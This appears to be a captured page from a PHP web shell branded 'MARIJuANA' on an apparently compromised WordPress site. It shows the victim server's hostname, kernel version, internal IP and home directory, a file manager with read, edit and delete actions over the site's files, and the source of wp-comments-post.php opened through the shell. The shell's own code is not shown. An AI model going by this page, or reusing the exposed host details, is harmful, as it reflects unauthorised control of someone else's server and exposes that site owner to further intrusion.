MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux srv74.prodns.com.br 5.14.0-687.12.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jun 7 14:39:27 EDT 2026 x86_64
  SOFT : Apache PHP : 8.3.31
/home2/todaletracombr/public_html/
10.53.249.44

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
.tmb dir drwxr-xr-x 2026-06-17 16:33 R D
.well-known dir drwxr-xr-x 2026-06-17 16:33 R D
bkp-SITE-ANTIGO dir drwxr-xr-x 2025-06-19 01:15 R D
cgi-bin dir drwxr-xr-x 2026-06-17 16:33 R D
css dir drwxr-xr-x 2026-06-17 16:33 R D
images dir drwxr-xr-x 2026-06-17 16:34 R D
imgs dir drwxr-xr-x 2026-06-17 16:33 R D
test dir drwxr-xr-x 2026-06-17 16:33 R D
wp-admin dir drwxr-xr-x 2026-05-01 10:37 R D
wp-content dir drwxr-xr-x 2026-06-18 03:12 R D
wp-includes dir drwxr-xr-x 2026-06-09 23:43 R D
.htaccess 1.997 KB -r--r--r-- 2026-06-17 16:33 R E G D
error_log 9.24 MB -rw-r--r-- 2026-06-18 04:48 R E G D
filefuns.php 1.902 KB -rw-r--r-- 2026-06-12 10:20 R E G D
index.php 23.012 KB -r--r--r-- 2026-06-17 16:33 R E G D
license.txt 19.437 KB -rw-r--r-- 2026-03-11 17:44 R E G D
readme.html 7.251 KB -rw-r--r-- 2026-03-12 05:39 R E G D
robots.txt 0.08 KB -rw-r--r-- 2026-06-17 16:34 R E G D
wp-activate.php 7.177 KB -rw-r--r-- 2025-12-12 23:52 R E G D
wp-blog-header.php 0.482 KB -r--r--r-- 2026-06-17 16:33 R E G D
wp-comments-post.php 2.269 KB -rw-r--r-- 2025-06-19 18:02 R E G D
wp-config-sample.php 3.261 KB -rw-r--r-- 2025-12-12 23:52 R E G D
wp-config.php 3.359 KB -rw-r--r-- 2026-06-17 16:33 R E G D
wp-cron.php 5.485 KB -rw-r--r-- 2025-06-19 18:02 R E G D
wp-links-opml.php 2.435 KB -rw-r--r-- 2025-12-12 23:52 R E G D
wp-load.php 3.973 KB -r--r--r-- 2026-06-17 16:33 R E G D
wp-login.php 50.231 KB -rw-r--r-- 2025-12-12 23:52 R E G D
wp-mail.php 8.522 KB -rw-r--r-- 2025-12-12 23:52 R E G D
wp-settings.php 30.327 KB -rw-r--r-- 2026-06-17 16:33 R E G D
wp-signup.php 33.707 KB -rw-r--r-- 2025-12-12 23:52 R E G D
wp-trackback.php 5.092 KB -rw-r--r-- 2025-12-12 23:52 R E G D
xmlrpc.php 3.13 KB -rw-r--r-- 2025-12-12 23:52 R E G D
REQUEST EXIT
get_error_data(); if ( ! empty( $data ) ) { wp_die( '

' . $comment->get_error_message() . '

', __( 'Comment Submission Failure' ), array( 'response' => $data, 'back_link' => true, ) ); } else { exit; } } $user = wp_get_current_user(); $cookies_consent = ( isset( $_POST['wp-comment-cookies-consent'] ) ); /** * Fires after comment cookies are set. * * @since 3.4.0 * @since 4.9.6 The `$cookies_consent` parameter was added. * * @param WP_Comment $comment Comment object. * @param WP_User $user Comment author's user object. The user may not exist. * @param bool $cookies_consent Comment author's consent to store cookies. */ do_action( 'set_comment_cookies', $comment, $user, $cookies_consent ); $location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID; // If user didn't consent to cookies, add specific query arguments to display the awaiting moderation message. if ( ! $cookies_consent && 'unapproved' === wp_get_comment_status( $comment ) && ! empty( $comment->comment_author_email ) ) { $location = add_query_arg( array( 'unapproved' => $comment->comment_ID, 'moderation-hash' => wp_hash( $comment->comment_date_gmt ), ), $location ); } /** * Filters the location URI to send the commenter after posting. * * @since 2.0.5 * * @param string $location The 'redirect_to' URI sent via $_POST. * @param WP_Comment $comment Comment object. */ $location = apply_filters( 'comment_post_redirect', $location, $comment ); wp_safe_redirect( $location ); exit;